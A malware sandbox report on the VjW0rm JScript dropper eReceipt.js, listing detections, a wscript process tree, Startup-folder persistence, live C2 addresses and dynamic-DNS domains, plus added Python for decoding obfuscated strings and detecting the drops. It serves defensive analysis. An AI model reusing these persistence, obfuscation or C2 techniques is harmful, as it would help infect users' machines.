
Windows Analysis Report
eReceipt.js

Overview

General Information

Sample Name:eReceipt.js
Analysis ID:628800
MD5:00073a5b3551f0759bf070f9954c96c0
SHA1:c68e16991a3453fc8a33abe802421830efaa1fec
SHA256:c8238e4ba5d2aafcb132239f682f11ba67387adc8abc80ac0614d3dbe3634e6d
Tags:jsVjw0rm

Detection

VjW0rm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for submitted file
Yara detected VjW0rm
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Sigma detected: Drops script at startup location
Snort IDS alert for network traffic
Wscript called in batch mode (suppress errors)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Potential malicious VBS/JS script found (suspicious encoded strings)
Creates multiple autostart registry keys
Drops script or batch files to the startup folder
Uses known network protocols on non-standard ports
JavaScript source code contains call to eval containing suspicious API calls
Uses dynamic DNS services
AV process strings found (often used to terminate AV products)
Yara signature match
Java / VBScript file with very long strings (likely obfuscated code)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Detected TCP or UDP traffic on non-standard ports
Internet Provider seen in connection with other malware
Creates a start menu entry (Start Menu\Programs\Startup)
Stores files to the Windows start menu directory
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
JavaScript source code contains large arrays or strings with random content potentially encoding malicious code
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

  • System is w10x64
  • wscript.exe (PID: 3908 cmdline: C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\eReceipt.js" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • wscript.exe (PID: 5516 cmdline: C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • wscript.exe (PID: 6860 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\eReceipt.js" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • wscript.exe (PID: 6652 cmdline: C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • wscript.exe (PID: 4448 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • wscript.exe (PID: 5768 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\eReceipt.js" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • wscript.exe (PID: 2312 cmdline: C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • wscript.exe (PID: 5512 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • wscript.exe (PID: 792 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eReceipt.js" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • wscript.exe (PID: 6408 cmdline: C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • wscript.exe (PID: 1928 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XZqsVjnTsr.js" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • cleanup
No configs have been found
Source: 00000009.00000002.880440429.0000011D6BAC4000.00000004.00000020.00020000.00000000.sdmp
Rule: SUSP_Base64_Encoded_Hex_Encoded_Code
Description: Detects hex encoded code that has been base64 encoded
Author: Florian Roth
Strings:
  • 0x14f28:$x1: 78 34 4E 7A 4A 63 65 44 51 78 58 48 67
  • 0x1520c:$x1: 78 34 4E 6A 46 63 65 44 63 30 58 48 67
  • 0x16cec:$x1: 78 34 4E 6D 5A 63 65 44 59 30 58 48 67
  • 0x16cfc:$x1: 78 34 4E 54 4E 63 65 44 63 30 58 48 67
  • 0x16f30:$x1: 78 34 4E 32 56 63 65 44 4E 6C 58 48 67
  • 0x16f50:$x1: 78 34 4E 6A 52 63 65 44 51 79 58 48 67
  • 0x16ffc:$x1: 78 34 4E 6D 56 63 65 44 59 7A 58 48 67
  • 0x1700c:$x1: 78 34 4E 6A 6C 63 65 44 5A 6D 58 48 67
  • 0x1702c:$x1: 78 34 4E 7A 5A 63 65 44 59 78 58 48 67
  • 0x1709c:$x1: 78 34 4E 6A 5A 63 65 44 49 34 58 48 67
  • 0x170ac:$x1: 78 34 4E 54 52 63 65 44 4A 6C 58 48 67
  • 0x170bc:$x1: 78 34 4E 57 4A 63 65 44 49 34 58 48 67
  • 0x170cc:$x1: 78 34 4E 7A 6C 63 65 44 63 77 58 48 67
  • 0x170dc:$x1: 78 34 4E 6D 5A 63 65 44 59 32 58 48 67
  • 0x170ec:$x1: 78 34 4E 6A 46 63 65 44 59 79 58 48 67
  • 0x17644:$x1: 78 34 4E 7A 5A 63 65 44 59 78 58 48 67
  • 0x178c8:$x1: 78 34 4E 6D 4E 63 65 44 5A 6B 58 48 67
  • 0x178d8:$x1: 78 34 4E 6D 5A 63 65 44 49 30 58 48 67
  • 0x17a40:$x1: 78 34 4E 6A 46 63 65 44 5A 6D 58 48 67
  • 0x17ab0:$x1: 78 34 4E 6D 5A 63 65 44 5A 6B 58 48 67
  • 0x17ac0:$x1: 78 34 4E 6A 64 63 65 44 59 78 58 48 67
Source: 00000012.00000002.881139684.0000026BB35D2000.00000004.00000020.00020000.00000000.sdmp
Rule: JoeSecurity_VjW0rm
Description: Yara detected VjW0rm
Author: Joe Security
    Source: 00000010.00000002.882089368.00000244AF3F0000.00000004.00000020.00020000.00000000.sdmp
    Rule: SUSP_Base64_Encoded_Hex_Encoded_Code
    Description: Detects hex encoded code that has been base64 encoded
    Author: Florian Roth
    Strings:
    • 0x8124:$x1: 78 34 4E 6D 56 63 65 44 63 32 58 48 67
    • 0x8134:$x1: 78 34 4E 6D 4E 63 65 44 59 35 58 48 67
    • 0x8154:$x1: 78 34 4E 7A 52 63 65 44 59 78 58 48 67
    • 0x8164:$x1: 78 34 4E 6D 4A 63 65 44 59 31 58 48 67
    • 0x8184:$x1: 78 34 4E 6D 5A 63 65 44 63 32 58 48 67
    • 0x8194:$x1: 78 34 4E 6A 52 63 65 44 59 31 58 48 67
    • 0x81b4:$x1: 78 34 4E 6D 5A 63 65 44 63 30 58 48 67
    • 0x81c4:$x1: 78 34 4E 7A 52 63 65 44 63 35 58 48 67
    • 0x81d4:$x1: 78 34 4E 6A 56 63 65 44 49 77 58 48 67
    • 0x81e4:$x1: 78 34 4E 7A 52 63 65 44 63 79 58 48 67
    • 0x81f4:$x1: 78 34 4E 6D 56 63 65 44 59 33 58 48 67
    • 0x84b4:$x1: 78 34 4E 7A 4A 63 65 44 59 35 58 48 67
    • 0x84c4:$x1: 78 34 4E 6D 4E 63 65 44 59 35 58 48 67
    • 0x84d4:$x1: 78 34 4E 6A 46 63 65 44 63 30 58 48 67
    • 0x84e4:$x1: 78 34 4E 6D 5A 63 65 44 5A 6C 58 48 67
    • 0x84f4:$x1: 78 34 4E 6A 56 63 65 44 63 79 58 48 67
    • 0x8504:$x1: 78 34 4E 6D 5A 63 65 44 63 79 58 48 67
    • 0x8514:$x1: 78 34 4E 6A 5A 63 65 44 5A 6D 58 48 67
    • 0x8534:$x1: 78 34 4E 7A 52 63 65 44 59 78 58 48 67
    • 0x85f0:$x1: 78 34 4E 6D 4E 63 65 44 59 78 58 48 67
    • 0x8600:$x1: 78 34 4E 6A 46 63 65 44 63 32 58 48 67
    Source: 00000006.00000002.880223665.000001C979E1C000.00000004.00000020.00020000.00000000.sdmp
    Rule: JoeSecurity_VjW0rm
    Description: Yara detected VjW0rm
    Author: Joe Security
      Source: 00000000.00000002.881750287.000001C6DCC58000.00000004.00000020.00020000.00000000.sdmp
      Rule: SUSP_Base64_Encoded_Hex_Encoded_Code
      Description: Detects hex encoded code that has been base64 encoded
      Author: Florian Roth
      Strings:
      • 0x9034:$x1: 78 34 4E 6D 56 63 65 44 63 32 58 48 67
      • 0x9044:$x1: 78 34 4E 6D 4E 63 65 44 59 35 58 48 67
      • 0x9064:$x1: 78 34 4E 7A 52 63 65 44 59 78 58 48 67
      • 0x9074:$x1: 78 34 4E 6D 4A 63 65 44 59 31 58 48 67
      • 0x9094:$x1: 78 34 4E 6D 5A 63 65 44 63 32 58 48 67
      • 0x90a4:$x1: 78 34 4E 6A 52 63 65 44 59 31 58 48 67
      • 0x90c4:$x1: 78 34 4E 6D 5A 63 65 44 63 30 58 48 67
      • 0x90d4:$x1: 78 34 4E 7A 52 63 65 44 63 35 58 48 67
      • 0x90e4:$x1: 78 34 4E 6A 56 63 65 44 49 77 58 48 67
      • 0x90f4:$x1: 78 34 4E 7A 52 63 65 44 63 79 58 48 67
      • 0x9104:$x1: 78 34 4E 6D 56 63 65 44 59 33 58 48 67
      • 0x93c4:$x1: 78 34 4E 7A 4A 63 65 44 59 35 58 48 67
      • 0x93d4:$x1: 78 34 4E 6D 4E 63 65 44 59 35 58 48 67
      • 0x93e4:$x1: 78 34 4E 6A 46 63 65 44 63 30 58 48 67
      • 0x93f4:$x1: 78 34 4E 6D 5A 63 65 44 5A 6C 58 48 67
      • 0x9404:$x1: 78 34 4E 6A 56 63 65 44 63 79 58 48 67
      • 0x9414:$x1: 78 34 4E 6D 5A 63 65 44 63 79 58 48 67
      • 0x9424:$x1: 78 34 4E 6A 5A 63 65 44 5A 6D 58 48 67
      • 0x9444:$x1: 78 34 4E 7A 52 63 65 44 59 78 58 48 67
      • 0x9500:$x1: 78 34 4E 6D 4E 63 65 44 59 78 58 48 67
      • 0x9510:$x1: 78 34 4E 6A 46 63 65 44 63 32 58 48 67
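Added note for this report, not part of the Joe Sandbox output: every $x1 string above is a 13-character run of base64 text. Decoded at the right alignment, each one is a slice of a JScript string that was written as \xNN hex escapes and then base64-encoded (x4NzJceDQxXHg covers \x72\x41, the letters "rA"; x4NTNceDc0XHg covers \x53\x74, "St"), which is the two-layer wrapping the rule name describes. The Python below was written for this page and is not the sample's code: it rebuilds that wrapping on a constructed JScript line, shows why a marker in base64 has three spellings (one per byte offset inside a 3-byte group), and decodes the report's fragments back to text. The sample JScript line and the fragment-decoding approach are this example's own; the four fragments are copied from the matches above.

```python
import base64
import re

# Constructed sample (not the eReceipt.js payload): a JScript line hex-escaped
# as \xNN per character and then base64-encoded, the double wrapping that the
# SUSP_Base64_Encoded_Hex_Encoded_Code rule is written to catch.
SAMPLE_JS = 'var sh = new ActiveXObject("WScript.Shell"); sh.Run("calc");'

HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")


def hex_escape(text: str) -> str:
    """Layer 1 of the obfuscation: spell every character as \\xNN."""
    return "".join("\\x%02x" % ord(c) for c in text)


def layer_encode(text: str) -> str:
    """Layer 2: base64 over the hex-escaped text (what the obfuscator emits)."""
    return base64.b64encode(hex_escape(text).encode("latin-1")).decode("ascii")


def layer_decode(blob: str) -> str:
    """Peel both layers: base64 -> \\xNN string -> plaintext."""
    escaped = base64.b64decode(blob).decode("latin-1")
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), escaped)


def b64_alignments(marker: bytes) -> list:
    """The three base64 spellings of `marker`, one for each position it can
    occupy inside a 3-byte group. Only characters fully determined by the
    marker are kept, which is why a base64 rule needs three strings per marker."""
    out = []
    for shift in range(3):
        enc = base64.b64encode(b"\0" * shift + marker).decode("ascii").rstrip("=")
        lead = (shift * 8 + 5) // 6             # chars tainted by filler bits
        full = (shift + len(marker)) * 8 // 6   # chars fully determined
        out.append(enc[lead:full])
    return out


def decode_fragment(fragment: str) -> str:
    """Triage a Yara hit: a base64 substring that starts at an unknown offset
    inside a 4-char group. Try each offset, drop the bytes tainted by the
    filler, and return the characters recovered from the \\xNN escapes. A
    leading 'xNN' whose backslash was cut off by the alignment is accepted."""
    best = ""
    for lead in range(4):
        padded = "A" * lead + fragment
        trail = -len(padded) % 4
        raw = base64.b64decode(padded + "A" * trail)
        head = (lead * 6 + 7) // 8              # bytes touched by leading filler
        tail = (trail * 6 + 7) // 8             # bytes touched by trailing filler
        body = raw[head:len(raw) - tail].decode("latin-1")
        chars = "".join(chr(int(h, 16))
                        for h in re.findall(r"(?:\\|^)x([0-9a-fA-F]{2})", body))
        if len(chars) > len(best):
            best = chars
    return best


if __name__ == "__main__":
    blob = layer_encode(SAMPLE_JS)
    print("encoded :", blob[:60], "...")
    print("decoded :", layer_decode(blob))
    print("marker  :", b64_alignments(b"\\x72\\x41\\x"))
    for hit in ("x4NzJceDQxXHg", "x4NjFceDc0XHg", "x4NmZceDY0XHg", "x4NTNceDc0XHg"):
        print(hit, "->", repr(decode_fragment(hit)))
```

decode_fragment tries the four possible leading offsets, strips the bytes whose bits depend on the missing neighbours, and keeps the alignment that yields \xNN escapes; for hits like these the recovered letters are enough to tell an obfuscated script body from, say, a base64-encoded binary. The rule fires on the encoding shape, not on malice: a legitimate minified library that was hex-escaped and base64-encoded would match too, so treat it as the hunting lead its author intended rather than a verdict.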

      Data Obfuscation

      Source: File created Author: Joe Security Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 3908, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eReceipt.js
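The Sigma hit above and the process tree at the top of the report (wscript.exe writing eReceipt.js into the Startup folder, then relaunching XZqsVjnTsr.js with the //B switch from a wscript.exe parent) give three cheap host-side detections. The Python below is an added example, not part of the Joe Sandbox report or the malware: it runs those checks over constructed Sysmon-style events whose values are modelled on the report. The field names follow Sysmon EventID 11 (FileCreate) and EventID 1 (ProcessCreate); the third event, a vendor installer dropping a .lnk shortcut, is a constructed benign control.

```python
import re
from pathlib import PureWindowsPath

# Constructed Sysmon-style events (not the report's raw log) that mirror what the
# sandbox recorded: FileCreate (EventID 11) into the Startup folder and
# ProcessCreate (EventID 1) of wscript.exe with the //B host switch.
SAMPLE_EVENTS = [
    {"EventID": 11, "ProcessId": 3908, "Image": r"C:\Windows\System32\wscript.exe",
     "TargetFilename": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eReceipt.js"},
    {"EventID": 11, "ProcessId": 3908, "Image": r"C:\Windows\System32\wscript.exe",
     "TargetFilename": r"C:\Users\user\AppData\Roaming\XZqsVjnTsr.js"},  # not in Startup
    {"EventID": 11, "ProcessId": 4100, "Image": r"C:\Program Files\Vendor\setup.exe",
     "TargetFilename": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Vendor Tray.lnk"},  # shortcut, not a script
    {"EventID": 1, "ProcessId": 5516, "ParentProcessId": 3908,
     "Image": r"C:\Windows\System32\wscript.exe", "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js'},
    {"EventID": 1, "ProcessId": 4448, "ParentProcessId": 700,
     "Image": r"C:\Windows\System32\WScript.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js"'},
]

# Matches both the per-user and the all-users (ProgramData) Startup folder.
STARTUP_DIR = re.compile(r"\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", re.IGNORECASE)
SCRIPT_EXT = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta", ".bat", ".cmd", ".ps1"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# WSH host options are //-prefixed and case-insensitive; //B is batch mode
# (no dialogs, no error pop-ups), which is what the report's signature flags.
BATCH_SWITCH = re.compile(r"(?:^|\s)//B(?=\s|$)", re.IGNORECASE)


def image_name(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def startup_script_drops(events):
    """Sigma-style 'drops script at startup location': a FileCreate whose
    target is a script file inside a Startup folder."""
    return [(e["ProcessId"], e["TargetFilename"]) for e in events
            if e.get("EventID") == 11
            and STARTUP_DIR.search(e.get("TargetFilename", ""))
            and PureWindowsPath(e["TargetFilename"]).suffix.lower() in SCRIPT_EXT]


def batch_mode_script_hosts(events):
    """'Wscript called in batch mode': a script host started with //B."""
    return [(e["ProcessId"], e["CommandLine"]) for e in events
            if e.get("EventID") == 1
            and image_name(e.get("Image", "")) in SCRIPT_HOSTS
            and BATCH_SWITCH.search(e.get("CommandLine", ""))]


def script_host_chains(events):
    """A script host spawning another script host: the parent/child shape of
    the report's process tree (a dropper relaunching its second stage)."""
    return [(e["ParentProcessId"], e["ProcessId"]) for e in events
            if e.get("EventID") == 1
            and image_name(e.get("Image", "")) in SCRIPT_HOSTS
            and image_name(e.get("ParentImage", "")) in SCRIPT_HOSTS]


def triage(events):
    return {"startup_script_drops": startup_script_drops(events),
            "batch_mode_script_hosts": batch_mode_script_hosts(events),
            "script_host_chains": script_host_chains(events)}


if __name__ == "__main__":
    for rule, hits in triage(SAMPLE_EVENTS).items():
        print(rule, "->", hits)
```

Each check is deliberately independent: the Startup-folder rule needs no process context, the //B rule fires even when the script is dropped somewhere else, and the host-spawns-host rule catches the relaunch even if the switch is removed. Note the malformed quoting in the recorded command line (a closing quote after wscript.exe with no opening one); the regex keys on the switch surrounded by whitespace rather than on the quoting, so it still matches.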
      Timestamp: 05/17/22-23:13:15.273410
      Source IP: 192.168.2.7
      Destination IP: 212.193.30.129
      Source Port: 49772
      Destination Port: 9003
      SID: 2828283
      Protocol: TCP
      Classtype: A Network Trojan was detected

      Timestamp: 05/17/22-23:10:33.772326
      Source IP: 192.168.2.7
      Destination IP: 212.193.30.129
      Source Port: 49762
      Destination Port: 9003
      SID: 2828283
      Protocol: TCP
      Classtype: A Network Trojan was detected

      Timestamp: 05/17/22-23:13:30.858787
      Source IP: 192.168.2.7
      Destination IP: 212.193.30.129
      Source Port: 49788
      Destination Port: 9003
      SID: 2828283
      Protocol: TCP
      Classtype: A Network Trojan was detected

      Timestamp: 05/17/22-23:13:08.959758
      Source IP: 192.168.2.7
      Destination IP: 212.193.30.129
      Source Port: 49781
      Destination Port: 9003
      SID: 2828283
      Protocol: TCP
      Classtype: A Network Trojan was detected


      AV Detection

      Source: eReceipt.js ReversingLabs: Detection: 19%
      Source: http://travcharles.duia.ro:5098 Avira URL Cloud: Label: malware
      Source: zeegod.duckdns.org Virustotal: Detection: 9%
      Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
      Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user
      Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming
      Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
      Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
      Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData

      Software Vulnerabilities

      Source: eReceipt.js Argument value: ['"hober$$$$=WSH.CreateObject("adodb.stream")"', '"var lmao$$$_=WSH.CreateObject("microsoft.xmldom").createElement("mko")"']

      Networking

      Source: C:\Windows\System32\wscript.exe Network Connect: 212.193.30.129 9003
      Source: C:\Windows\System32\wscript.exe Domain query: zeegod.duckdns.org
      Source: Traffic Snort IDS: 2828283 ETPRO TROJAN VJworm Checkin 192.168.2.7:49762 -> 212.193.30.129:9003
      Source: Traffic Snort IDS: 2828283 ETPRO TROJAN VJworm Checkin 192.168.2.7:49772 -> 212.193.30.129:9003
      Source: Traffic Snort IDS: 2828283 ETPRO TROJAN VJworm Checkin 192.168.2.7:49781 -> 212.193.30.129:9003
      Source: Traffic Snort IDS: 2828283 ETPRO TROJAN VJworm Checkin 192.168.2.7:49788 -> 212.193.30.129:9003
      Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 9003
      Source: unknown Network traffic detected: HTTP traffic on port 9003 -> 49762
      Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 9003
      Source: unknown Network traffic detected: HTTP traffic on port 9003 -> 49772
      Source: unknown Network traffic detected: HTTP traffic on port 49781 -> 9003
      Source: unknown Network traffic detected: HTTP traffic on port 9003 -> 49781
      Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 9003
      Source: unknown Network traffic detected: HTTP traffic on port 9003 -> 49788
      (repeated entries for the same four flows collapsed)
      Source: unknown DNS query: name: zeegod.duckdns.org
      Source: global traffic TCP traffic: 192.168.2.7:49762 -> 212.193.30.129:9003
      Source: Joe Sandbox View ASN Name: SPD-NETTR SPD-NETTR
      Source: wscript.exe, 00000012.00000002.881139684.0000026BB35D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000012.00000002.879936544.0000026BB17B2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000012.00000002.879648858.000000D426DC1000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098
      Source: wscript.exe, 00000012.00000002.880111499.0000026BB17E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098Vre
      Source: wscript.exe, 0000000C.00000002.881519996.00000171E2B20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098Vre%
      Source: wscript.exe, 00000001.00000002.881152946.000001FE424AE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.881519996.00000171E2B20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098Vre0
      Source: wscript.exe, 00000001.00000002.882158430.000001FE44A30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.881172921.000001C97BE80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.882890634.00000280CB850000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.881999035.00000239FAD10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.881519996.00000171E2B20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000012.00000002.881266863.0000026BB3900000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098Vre563209-4053062332-100
      Source: wscript.exe, 00000007.00000002.881546053.00000280C921B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.827671805.00000280C9218000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098Vre783C6-CB41-11D1-8B02-00600806D9B6
      Source: wscript.exe, 00000007.00000002.881546053.00000280C921B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.827671805.00000280C9218000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098Vre7E9B0-70EF-11D1-B75A-00A0C90564FE
      Source: wscript.exe, 0000000C.00000002.881519996.00000171E2B20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098VreE
      Source: wscript.exe, 00000001.00000002.882158430.000001FE44A30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.881999035.00000239FAD10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.881519996.00000171E2B20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000012.00000002.881266863.0000026BB3900000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098VreM
      Source: wscript.exe, 00000006.00000002.881172921.000001C97BE80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098VreM8
      Source: wscript.exe, 00000007.00000002.882890634.00000280CB850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098VreMH
      Source: wscript.exe, 00000006.00000002.880223665.000001C979E1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.827815477.00000280C91ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.881255255.00000280C91ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.880832784.00000171E0417000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098VreMcroWinows
      Source: wscript.exe, 0000000A.00000002.880775140.00000239F8B9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098VreMcroWinowsiniF
      Source: wscript.exe, 00000012.00000002.879936544.0000026BB17B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098VreMcroWinowsiniG
      Source: wscript.exe, 00000001.00000002.881083256.000001FE4248F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098VreMcroWinowsu
      Source: wscript.exe, 0000000C.00000002.881056298.00000171E0430000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098VreMicrosoft
      Source: wscript.exe, 00000001.00000002.882158430.000001FE44A30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.882890634.00000280CB850000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.881999035.00000239FAD10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098VreS~1
      Source: wscript.exe, 00000001.00000002.881152946.000001FE424AE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.880223665.000001C979E1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.880995729.00000239F8BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098VreWOW64
      Source: wscript.exe, 00000007.00000002.881546053.00000280C921B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.827671805.00000280C9218000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098VreY
      Source: wscript.exe, 00000001.00000002.882158430.000001FE44A30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098VreZ
      Source: wscript.exe, 00000007.00000002.881546053.00000280C921B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.827671805.00000280C9218000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098Vrea
      Source: wscript.exe, 0000000C.00000002.881519996.00000171E2B20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000012.00000002.880111499.0000026BB17E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098Vredesk
      Source: wscript.exe, 0000000C.00000002.881519996.00000171E2B20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098Vree
      Source: wscript.exe, 0000000A.00000002.881999035.00000239FAD10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098Vref:
      Source: wscript.exe, 00000007.00000002.881546053.00000280C921B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.827671805.00000280C9218000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098Vrei
      Source: wscript.exe, 00000001.00000002.882158430.000001FE44A30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.881172921.000001C97BE80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.882890634.00000280CB850000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.881999035.00000239FAD10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.881519996.00000171E2B20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000012.00000002.881266863.0000026BB3900000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098Vreosoft
      Source: wscript.exe, 00000001.00000002.880864667.000001FE4244C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098Vreosoft.xmldom
      Source: wscript.exe, 00000006.00000002.880223665.000001C979E1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098Vrep
      Source: wscript.exe, 00000001.00000002.882158430.000001FE44A30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://travcharles.duia.ro:5098Vrer
      Source: wscript.exe, 00000000.00000002.882808280.000001C6DD8AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org/
      Source: wscript.exe, 00000000.00000002.882808280.000001C6DD8AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org/telPROCESSOR_LEVEL=6PROCESSOR_RC
      Source: wscript.exe, 00000010.00000002.884207305.00000244AFE70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.457112240.00000244AF413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zeegod.duckdns.org:9003/
